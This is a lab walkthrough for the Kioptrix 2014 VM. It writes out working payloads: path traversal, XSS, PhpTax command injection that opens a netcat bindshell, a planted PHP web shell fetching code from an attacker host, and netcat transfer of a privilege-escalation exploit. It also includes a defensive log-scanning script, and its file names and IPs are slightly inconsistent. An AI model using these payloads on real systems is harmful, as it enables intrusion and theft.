Vulnhub Series: 05

Kioptrix: 2014 (#5) Walkthrough (Vulnhub | OSCP Model)


Step by Step process:

Target Machine VM's IP:
Step 1: I start by finding the IP address of the target Kioptrix 2014 VM using the command below.

netdiscover -r 192.168.48.0/24

Enumeration:

Step 2: Nmap scan to identify the running services.
nmap -Pn -A -v 192.168.48.170

Step 3: Look for directories and interesting files with the commands below.
dirb http://192.168.48.170
nikto -h http://192.168.48.170

Step 4: After enumeration, research any publicly available exploits for the discovered services.

Gaining Access (Exploitation):

Step 1: Check the page source code for any clues.

Wow, we found a URL in the comment section: pChart2.1.3/index.php

https://www.exploit-db.com/exploits/31173/

[1] Directory Traversal:
http://192.168.48.170/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

According to this page https://www.freebsd.org/doc/handbook/network-apache.html the httpd.conf file is here:
/usr/local/etc/apache2x/httpd.conf
ErrorLog "/var/log/httpd-error.log"
CustomLog "/var/log/httpd-access.log"

http://192.168.48.170/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

Find the SetEnvIf User-Agent parameter in the httpd.conf file:

Mozilla/4.0 Mozilla4_browser

[2] Cross-Site Scripting (XSS):
http://192.168.48.170/pChart2.1.3/examples/sandbox/script/session.php?alert('XSS')

Getting a shell:

PhpTax is vulnerable to a public Exploit-DB exploit: https://www.exploit-db.com/exploits/21665/

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

**Exploit-DB verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

http://192.168.48.170:8080/phptax/drawimage.php?pfilez=xxx;echo%20%27%3C?php%20system($_GET%5Bcmd%5D);%20?%3E%27%20%3E%20cmd.php;&pdf=make

http://192.168.48.170:8080/phptax/cmd.php?cmd=fetch%20http://192.168.48.171:8100/shell.txt
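As an added defensive example (my own code, not part of the original walkthrough and not code from pChart or PhpTax), the Python script below scans constructed Apache access-log lines for the two request shapes seen above: encoded `../` traversal in pChart's `Script` parameter and shell metacharacters in PhpTax's `pfilez` parameter. The sample lines, the common log format and the watched parameter names are assumptions taken from the URLs in this post.

```python
import re
from urllib.parse import unquote, urlsplit
# Constructed sample lines in Apache common log format (not captured from the VM).
SAMPLE_LOG = """\
192.168.48.171 - - [10/Jan/2020:10:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=pie.php HTTP/1.1" 200 512
192.168.48.171 - - [10/Jan/2020:10:00:02 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1843
192.168.48.171 - - [10/Jan/2020:10:00:03 +0000] "GET /phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make HTTP/1.1" 200 77
192.168.48.171 - - [10/Jan/2020:10:00:04 +0000] "GET /phptax/index.php?pfilez=1040d1-pg2.tob&pdf=make HTTP/1.1" 200 90
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
WATCHED_PARAMS = ("Script", "pfilez")  # file-name parameters: no traversal, no shell metacharacters
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
SHELL_META_RE = re.compile(r'[;|&`$]')

def parse_query(query):
    """Split on '&' before decoding, then decode twice so %252e%252e%252f-style double encoding is caught too."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(name, []).append(unquote(unquote(value)))
    return params

def analyse_request(target):
    """Return (kind, param, decoded_value) findings for one request target."""
    findings = []
    params = parse_query(urlsplit(target).query)
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if TRAVERSAL_RE.search(value):
                findings.append(("path_traversal", name, value))
            if SHELL_META_RE.search(value):
                findings.append(("command_injection", name, value))
    return findings

def scan_log(text):
    """Return one alert dict per suspicious parameter value found in the log text."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not common log format; skip the line
        for kind, param, value in analyse_request(m.group("target")):
            alerts.append({"ip": m.group("ip"), "time": m.group("ts"),
                           "kind": kind, "param": param, "value": value})
    return alerts

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['time']} {a['ip']} {a['kind']} {a['param']}={a['value']!r}")
```

On the target itself this would be run over the file named by the CustomLog directive above, /var/log/httpd-access.log.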

Privilege Escalation:

https://www.exploit-db.com/exploits/26368/

Attacker machine:
nc -lvq 6666 < /usr/share/exploitdb/platforms/freebsd/local/26368.c

Victim shell:
nc 10.0.0.55 6666 > /tmp/exploit.c

gcc exploit2.c -o exploit2

https://www.exploit-db.com/exploits/28718/

Clean up:
Just reset the victim machine to clean up.

Bingo :-) Got a root shell.
